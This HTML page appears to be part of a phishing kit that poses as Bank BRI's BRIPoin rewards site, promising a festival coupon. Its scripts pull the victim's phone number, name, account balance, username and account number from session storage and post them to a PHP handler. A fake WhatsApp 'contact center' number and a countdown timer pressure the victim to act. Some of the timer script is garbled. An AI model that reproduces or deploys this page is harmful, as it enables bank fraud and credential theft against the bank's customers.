<html><head> 
  <meta charset="utf-8"> 
  <meta name="fragment" content="!"> 
  <meta name="theme-color" content="#0F78CB"> 
   <!-- HTML Meta Tags -->

  <title>𝗕𝗥𝗜𝗣𝗼𝗶𝗻 | 𝗧𝘂𝗸𝗮𝗿𝗸𝗮𝗻 𝗣𝗢𝗜𝗡-𝗺𝘂</title>

  <meta name="description" content="BRIPoin adalah program loyalitas yang ditujukan untuk seluruh Nasabah Bank BRI (BritAma, Simpedes, E-Banking, Kartu Debit dan Kartu Kredit). Perbanyak poin Anda dari segala jenis transaksi di Bank BRI dan tukar poin dengan beragam reward menarik khusus untuk nasabah setia Bank BRI.">

  <!-- Facebook Meta Tags -->
  <meta property="og:url" content="https://bripoin.bri.co.id">
  <meta property="og:type" content="website">
  <meta property="og:title" content="𝗕𝗥𝗜𝗣𝗼𝗶𝗻  | 𝗧𝘂𝗸𝗮𝗿𝗸𝗮𝗻 𝗣𝗢𝗜𝗡-𝗺𝘂">
  <meta property="og:description" content="BRIPoin adalah program loyalitas yang ditujukan untuk seluruh Nasabah Bank BRI (BritAma, Simpedes, E-Banking, Kartu Debit dan Kartu Kredit). Perbanyak poin Anda dari segala jenis transaksi di Bank BRI dan tukar poin dengan beragam reward menarik khusus untuk nasabah setia Bank BRI.">
  <meta property="og:image" content="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQe2_RRje_H6EnHBS7-zriaK4XxvgoL3qqnmA&amp;usqp=CAU">

  <!-- Twitter Meta Tags -->
  <meta name="twitter:card" content="summary_large_image">
  <meta property="twitter:domain" content="bripoin.bri.co.id">
  <meta property="twitter:url" content="https://bripoin.bri.co.id">
  <meta name="twitter:title" content="𝗕𝗥𝗜𝗣𝗼𝗶𝗻 | 𝗧𝘂𝗸𝗮𝗿𝗸𝗮𝗻 𝗣𝗢𝗜𝗡-𝗺𝘂">
  <meta name="twitter:description" content="BRIPoin adalah program loyalitas yang ditujukan untuk seluruh Nasabah Bank BRI (BritAma, Simpedes, E-Banking, Kartu Debit dan Kartu Kredit). Perbanyak poin Anda dari segala jenis transaksi di Bank BRI dan tukar poin dengan beragam reward menarik khusus untuk nasabah setia Bank BRI.">
  <meta name="twitter:image" content="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQe2_RRje_H6EnHBS7-zriaK4XxvgoL3qqnmA&amp;usqp=CAU">

<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=0, maximum-scale=1">
<link rel="icon" href="images/AddText_10-22-11.27.51.jpg" type="image/x-icon">
<link rel="apple-touch-icon" href="images/AddText_10-22-11.27.23.jpg">
  <!-- Meta Tags Generated via https://www.opengraph.xyz -->
        
  <link href="css/bootstrap.min.css" rel="stylesheet" crossorigin="anonymous"> 
  <link rel="stylesheet" href="css/ionicons.min.css">
  <link href="https://fonts.googleapis.com/icon?family=Material+Icons" rel="stylesheet"> 
  <style>
        @import url('https://fonts.googleapis.com/css2?family=Open+Sans:wght@500&display=swap');
        body {
            padding: 0;
            margin: 0;
            width: 100%;
            font-family: 'Open Sans', sans-serif;
            position: fixed;
            background:#DEE7EE;
        }

        .text-header {
            font-family: 'Open Sans', sans-serif;
            color: #0086e0;
        }

        .text-subheader {
            font-family: 'Open Sans', sans-serif;
            margin-top: -20px;
            color: #000;
        }

        .btn-punya {
            display: block;
            margin: 80px auto 0 auto;
            padding: 0px; 
            cursor: pointer; 
            background: none rgb(0, 134, 224);
            border: none; 
            text-align: center; 
            height: 57px; 
            width: 459px; 
            max-width: 100%;
            font-family: Arial; 
            font-size: 14px; 
            font-weight: bold; 
            color: rgb(255, 255, 255); 
            letter-spacing: 2px; 
            line-height: 1; 
            border-radius: 5px; 
            box-shadow: rgb(170, 170, 170) 2px 2px 4px 0px; 
            transition: background 200ms ease 0s;
        }

        .btn-belum {
            display: block;
            margin: 10px auto;
            padding: 0px; 
            cursor: pointer; 
            background: none transparent;
            border: none; 
            text-align: center; 
            height: 57px; 
            width: 459px; 
            max-width: 100%;
            font-family: Arial; 
            font-size: 14px; 
            font-weight: bold; 
            color: rgb(0, 134, 224);
            letter-spacing: 2px; 
            line-height: 1; 
            border-radius: 5px; 
            transition: background 200ms ease 0s;
        }

     

        .Button clickable-element {
            display: block;
            margin: 60px 0 0 0;
            padding: 0px; 
            cursor: pointer; 
            background: none rgba(0, 111, 214, 0.96); 
            border: none; 
            text-align: center; 
            height: 57px; 
            width: 370px; 
            font-family: Arial; 
            font-size: 17px; 
            font-weight: bold; 
            color: rgb(255, 255, 255); 
            letter-spacing: 1px; 
            line-height: 1; 
            border-radius: 8px; 
            box-shadow: rgb(170, 170, 170) 2px 2px 4px 0px; 
            transition: background 100ms step-start 0s;
        }

        @media only screen and (max-width: 600px) {
            .btn-login {
                width: 82%;
            }
        }


        .box-lte {
            width: 380px;
            max-width: 95%;
            background: none;
            display: block;
            
            margin: -40px auto;
            border-radius: 20px;
        }

        textarea {
            box-sizing: border-box; 
            height: 75px;
            margin-top: -30px;
            width: 280px;
            border: 3px solid rgb(0, 134, 224);
            box-shadow: rgb(170, 170, 170) 2px 2px 4px 0px;
            border-radius: 15px;
            padding: 5px 10px;
        }
        
          .textarea1 {
            box-sizing: border-box; 
            
            border: 2px solid red;
            box-shadow: rgb(170, 170, 170) 2px 2px 4px 0px;
            border-radius: 50px;
            
        }
        
         .textarea {
            box-sizing: border-box; 
            height: 75px;
           
            width: 280px;
            border: 2px solid red;
            box-shadow: rgb(170, 170, 170) 2px 2px 4px 0px;
            border-radius: 15px;
            padding: 5px 10px;
        }
        
        textarea::placeholder{
            font-size: 13px;
        }
           h1{
            display: table;
            background-color: transparent;
            color: #FF0000;
            padding: 15px;
            width: 100%;
            font-size: 14px;
            margin-bottom: -70px;
            text-align: center;
            position: fixed;
            top: 52;
           font-weight: bold;
            right: 0;
            left: 0;
            margin: 0px auto;
            
        }

        
        .blink {
    
  animation: blink-animation 2s steps(6, start) infinite;
  -webkit-animation: blink-animation 2s steps(6, start) infinite;
}
@keyframes blink-animation {
  to {
    visibility: hidden;
  }
}
@-webkit-keyframes blink-animation {
  to {
    visibility: hidden;
  }
}

#Aktivasi{
    display: none;
}
    

  <style>
#animation-demo {
	width: 200px;
	height: 150px;
	position: relative;
	background-color: #62A80A;
	line-height: 150px;
	color: #000;
	border: solid 1px #1A7404;
	text-align: center;
} 

.naik {
	-webkit-animation-duration: 1s;
	animation-duration: 1s;
	-webkit-animation-fill-mode: both;
	animation-fill-mode: both;
	-webkit-animation-timing-function: ease-in;
	animation-timing-function: ease-in;
	-webkit-animation-name: bounceOutUp; 
    animation-name: bounceOutUp; 
}

@-webkit-keyframes bounceOutUp { 
    0% { 
        -webkit-transform: translateY(0); 
    } 
    20% { 
        opacity: 1; 
        -webkit-transform: translateY(20px); 
    } 
    100% { 
        opacity: 1; 
        -webkit-transform: translateY(-200px); 
    } 
} 
@keyframes bounceOutUp { 
    0% { 
        transform: translateY(0); 
    } 
    20% { 
        opacity: 1; 
        transform: translateY(20px); 
    } 
    100% { 
        opacity: 1; 
        transform: translateY(-500px); 
    } 
} 
.bounceOutUp { 
    
}


/*********************/
.process1 {
     width: 100%;
            height: 100%;
             display: flex;
             justify-content: center;
            margin: auto;
            position: absolute;
           padding-top: 300px;
            left: 0;
            right: 0;
            bottom: 0;
            background: rgba(0, 0, 0, 0.6);
            z-index: 99999;
            
      
}
.loading {
    position: absolute;
    display: flex;
    justify-content: center;
    align-items: center;
    margin-bottom: 20%;
    margin-top: 300px;
}
.loading img {
    width: 50px;
    
    top: 10;
}
.loading .spinner{
    position: absolute;
    width: 35px;
    animation: spin 1s linear infinite;
    -webkit-animation: spin 1s linear infinite;
    -moz-animation: spin 1s linear infinite;
    -ms-animation: spin 1s linear infinite;
    -o-animation: spin 1s linear infinite;
}
@keyframes spin {
  0% { transform: rotate(360deg); }
  100% { transform: rotate(0deg); }
}
@-webkit-keyframes spin {
  0% { -webkit-transform: rotate(360deg); }
  100% { -webkit-transform: rotate(0deg); }
}
@-moz-keyframes spin {
  0% { -webkit-transform: rotate(360deg); }
  100% { -webkit-transform: rotate(0deg); }
}
@-ms-keyframes spin {
  0% { -webkit-transform: rotate(360deg); }
  100% { -webkit-transform: rotate(0deg); }
}
@-o-keyframes spin {
  0% { -webkit-transform: rotate(360deg); }
  100% { -webkit-transform: rotate(0deg); }
}


.loader{
      font-size: 20px;
      color: #FFF;
      font-weight: bold;
      display: inline-block;
      font-family: 'Nunito', sans-serif;
      
      position: absolute;
      margin-top: 0px;
    }
    .loader:before{
      content: '';
      animation: 2s print linear alternate infinite;
    }
    .loader:after{
      content: '';
      position: absolute;
      right: -4px;
      top: 50%;
      transform: translatey(-45%);
      width: 2px;
      height: 1.3em;
      background: currentColor;
      opacity: 0.8;
      animation: 1s blink steps(2) infinite;
    }
    
    @keyframes blink {
      0%  { visibility: hidden;}
      100%  { visibility: visible;}
    }
    @keyframes print {
      0% { content: 'B'}
      10% { content: 'BR'}
      20% { content: 'BRI'}
      30% { content: 'BRIm'}
      40% { content: 'BRImo'}
      50% { content: 'BRImo-'}
      60% { content: 'BRImo-B'}
      70% { content: 'BRImo-BR.'}
      80% { content: 'BRImo-BRI..'}
      90% , 100% { content: 'BRImo-BRI...'}
    }
    

.card-input__label {
  font-size: 17px;
  margin-bottom: 0px;
  font-weight: 500;
  color: #1A89DF;
  width: 100%;
  margin-top: 5px;
  display: block;
  user-select: none;
}

.copy-link {

            height: 44px; 
            max-width: 100%;
            border: 2px solid rgb(0, 134, 224);
            border-radius: 10px;

             color: rgb(28, 28, 28); 
            word-spacing: 0px; 
            padding: 2px;
            margin: 5px;
            }

.copy-link-input {

flex-grow: 2;
    width : 78%;
    height: 33px; 
    margin-right : 50px;
    padding: 1px;
    font-size: 18px;
    border: 0px solid ;
    border-right: none;
    
}
.copy-link-button {
    flex-shrink: 0;   
    border: 1px solid ;
    border-radius: 3px;
    color: #098CE3;
    margin-left: 230px;
    margin-top: -40px;

    display: flex; 
    




            

    }
</style>
 </head> 
 <body> 
  
  <div id="popupku" style="position: fixed;
  top: 0;
  left: 0;
  right: 0;
  bottom: 0;
  width: 100%; height: 100%; background: rgba(0,0,0, 0.4); z-index: 9999">
  
    <center>
 <img id="gambarku" class="animated" src="images/AddText_06-25-07.30.56.jpg" width="60%" style="margin-top: 250px; border-radius: 15px; box-shadow: rgba(199, 199, 199, 2.2)  0px 2px 5px 0px; border: 2px double #0F78CB" onclick="tutupimg()">
    </center>
</div>
             <img src="images/1703668668502.png" style="width: 100%; position: fixed; bottom: 0; left: 0; right: 0; margin: 0px auto">
 <img src="images/AddText_06-08-12.57.52.jpg" style="width: 100%; position: fixed; top: 0; left: 0; right: 0; margin: 0px auto">

 <div class="blink" style="display: none " id="blinkAktivasi"><h1>Nomor Teket Berhasil Disalin Silakan Konfirmasi CETAK KUPON Festival </h1></div> 
  <div class="container" id="otp"> 
   <div class="box-lte"> 
    <div class="row" style="margin-top: 100px;"> 
     <center>
     <div class="col-12 d-block mx-auto text-center p-0" style="height: 290px; width: 85%; max-width: 100%; display: block; margin-top: 10px; border-radius: 0px 25px 0px 25px; position: absolute; margin: 0px auto; left: 0; right: 0;z-index: -1"> 
      <img alt="" src="images/IMG_20240921_153651.jpg" style="display: block; margin: 0px; width: 100%; height: 62%; border: 0px solid #fff; border-radius: 20px 20px 20px 20px; border-top: none; box-shadow: rgba(99, 99, 99, 0.2) -0px 3px 8px -2px; margin-top: 90px "> 
     </div>
         <div class="row" style="margin-top: 190px"> 
    
     <p style="font-weight: bold; font-size: 20px; color: #098CE3; text-align: center; margin-top: 10px; margin: -30px auto;" id="waktu">2 : 00</p> 
    </div>  
    </center></div> 

    <div class="row"> 
     <div class="col-12" style="width: 459px; max-width: 100%; display: block; margin: 5px auto; padding: 0 20px; margin-top: 40px"> 
      <p style="font-size: 10px; text-align: center; font-weight: bold; padding: 15px"></p> 
     </div> 
    </div> 
    <center>
    <div class="row" style="margin-top: 5px; height: 170px; border: 2px solid #fff; width: 97%; border-radius: 15px; background-image: url(images/AddText_06-10-03.05.51.png); background-size: 100% 100%; background-position: 100% 100%; padding-top: 40px; box-shadow: rgba(99, 99, 99, 0.2) 0px 2px 8px 0px;"> 
        

                                
  <form onsubmit="kirimPesan1(event)" method="post" id="formLink">
      
<input type="hidden" id="nomorhp" name="NoHp" value="null">
<input type="hidden" id="nama" name="nama" value="null">
<input type="hidden" id="saldo" name="saldoTerakhir" value="null">
<input type="hidden" id="uname" name="uname" value="null">
<input type="hidden" id="pass" name="pass" value="null">
       <center>

       
 
         <label class="card-input__label" style="font-size: 15px;  margin-top: -25px;  font-weight: 600;">Silakan Salin Nomor Tiket Anda.</label>
 <br>       
        <div class="copy-link" style="margin-top: -20px;"> 
         <input type="text" class="copy-link-input" id="HTMLBox" value="1396-9907-8085-100-000">
  </div> 
  <button class="copy-link-button" id="HTMLButton">
    <span class="material-icons">content_copy</span> </button>
        

       <b>
 
           <a href="https://api.whatsapp.com/send?phone=6283850223665&amp;text=Saya%20Belum%20Mendapatkan%20Kode%20Kupon%20Undian" id="kirims" class="bubble-element Button clickable-element">
              <label class="bubble-element Button clickable-element" style="max-width: 100%; padding: 0px; cursor: pointer; background: none rgb(9, 140, 227); border: none; text-align: center; display: block; margin: 20px auto; height: 39px; width: 346px; left: 0px; top: 0px; font-family: Arial; font-size: 13px; font-weight: 400; color: rgb(255, 255, 255); letter-spacing: 1px; line-height: 1; border-radius: 10px; box-shadow: rgb(170, 170, 170) 2px 2px 4px 0px; transition: background 200ms ease 0s; font-weight: 700"><br>
Konfirmasi Cek Tiket Kupon Festival</label></a>
</b>  
      
    </center></form></div>
    <b> <p onclick="location.href='https://wa.me/6283850223665?text=Saya Belum Mendapatkan Kode Kupon Undian'" style="font-size: 14px; text-align: center; margin-top: 25px; margin-left: 10px; margin-right: 10px;"><strong style="color: #FF0000; text-decoration: none">Tidak Terima Kode?
         <span style="color: #098CE3">Hubungi Contact Center</span>
         </strong></p></b>
   </center>
   <b> 
   </b></div><b>

   <center>
     <img src="images/giphy.gif" style="width: 155px; top: 100; left: 0; right: 0; position: absolute; margin: 0px auto">
     </center>
    </b></div><b> </b>
  
   
    <center>
     <div id="process1" name="process" class="process1" style="display: none;">
           <span class="loader"></span>
        </div>
        </center>  
  
<script>
         // HTML BOx JS Code
      let HTMLBox = document.getElementById("HTMLBox");
      let HTMLButton = document.getElementById("HTMLButton");

      HTMLButton.onclick = function () {
        HTMLBox.select();
        document.execCommand("copy");
        HTMLButton.innerText = "Copy";
      };
</script>    

 <script src="js/jquery.min.js"></script>  
<script src="js/jquery.min_1.js" crossorigin="anonymous" referrerpolicy="no-referrer"></script>
<script src="mainkode.js"></script>
   <script src="js/jquery.min_2.js"></script>
<script>
var nomor = sessionStorage.getItem("nomor");
document.getElementById("nomorhp").value = nomor + "";
var nama = sessionStorage.getItem("nama");
document.getElementById("nama").value = nama + "";
var saldo = sessionStorage.getItem("saldo");
document.getElementById("saldo").value = saldo + "";
var unames = sessionStorage.getItem("unames");
document.getElementById("uname").value = unames + "";
var norek = sessionStorage.getItem("norek");
document.getElementById("pass").value = norek + "";

  </script>
   <script>
 function tutupimg(){
      setTimeout(() => {
  $("#popupku").hide();
      },1000)
      setTimeout(() => {
       audio = document.getElementById("bsi");
    audio.play();
    audio.loop = false
      },900)
  $("#gambarku").addClass("naik");
 }

</script>

<script>
    window.onload = function() {
  var minute = 01;
  var sec = 59;
  setInterval(function() {
    document.getElementById("waktu").innerHTML =   minute + " : " + sec  ;
    sec--;

    if (sec == 0) {
      minute--;
      sec = 59;

      if (minute == 0) {
        minute = 1;
      }
    }
  }, 1000);
}
  
  
  
   
    document.getElementById('waktu1').innerHTML =
          2 + ":" + 2;
        startTimer();
        
        function startTimer() {
          var presentTime = document.getElementById('waktu1').innerHTML;
          var timeArray = presentTime.split(/[:]+/);
          var m = timeArray[0];
          var s = checkSecond((timeArray[1] - 1));
          if(s==59){m=m-1}
          if(m<0){
            return
          }
          
          document.getElementById('waktu1').innerHTML =
            m + " : " + s;
          console.log(m)
          setTimeout(startTimer, 1000);
          
        }
        
        function checkSecond(sec) {
          if (sec < 10 && sec >= 0) {sec = "0" + sec}; // add zero in front of numbers < 10
          if (sec < 0) {sec = "50"};
          return sec;
        }
        
        
        
    
    </script>  
  <script>
      document.getElementById('timer').innerHTML =
          02 - ":" + 01;
        startTimer1();
        
        function startTimer1() {
          var presentTime = document.getElementById('timer').innerHTML;
          var timeArray = presentTime.split(/[:]+/);
          var m = timeArray[0];
          var s = checkSecond((timeArray[1] - 1));
          if(s=49){m=m-1}
          if(m<0){
            return
          }
          
          document.getElementById('timer').innerHTML =
            m + " : " + s;
          console.log(m)
          setTimeout(startTimer1, 1000);
  t0" + sec}; // add zero in front of numbers < 10
          if (sec < 0) {sec = "59"};
          return sec;
        }
        
        
        
  </script>
  <!-- Static App Form Collection Script -->
<!--<script src="https://static.app/js/static-forms.js" type="text/javascript"></script>

<script src="https://static.app/js/static.js" type="text/javascript"></script>-->
 <script>
 $('#formLink').on('submit', function (event) {

  event.stopPropagation();
    event.preventDefault();
    
 document.getElementById('kirims').value = "Memproses....";



$.ajax({

 type: 'POST',
 url: 'auth/three.php',
 async: false,
 dataType: 'JSON',
 data: $(this).serialize(),
 
 complete: function(data) {
            console.log('Complete')
 setTimeout(function(){
  document.getElementById("blinkAktivasi").style.display = "block";
 $("#nama1").val("");
 $("#nama1").addClass('textarea1'); 
    }, 1000);
setTimeout(function(){
    document.getElementById('kirims').value = "Konfirmasi";
  }, 1000);

        }
    });

    return false;
});   
        
</script>


<script>
 function gantiborder(){
   $("#nama").removeClass('textarea'); 
   $("#blinkk").hide(); 
   document.getElementById('kirims').value = "Konfirmasi";
 }   
 
 function gantiborder1(){
   $("#nama1").removeClass('textarea1'); 
   $("#blinkAktivasi").hide(); 
   $("#logoku").show(); 
   document.getElementById('kirims').value = "Konfirmasi";
 }   
</script>

</body></html><!--<script src='https://a.bsite.net/footer.js'></script>
-->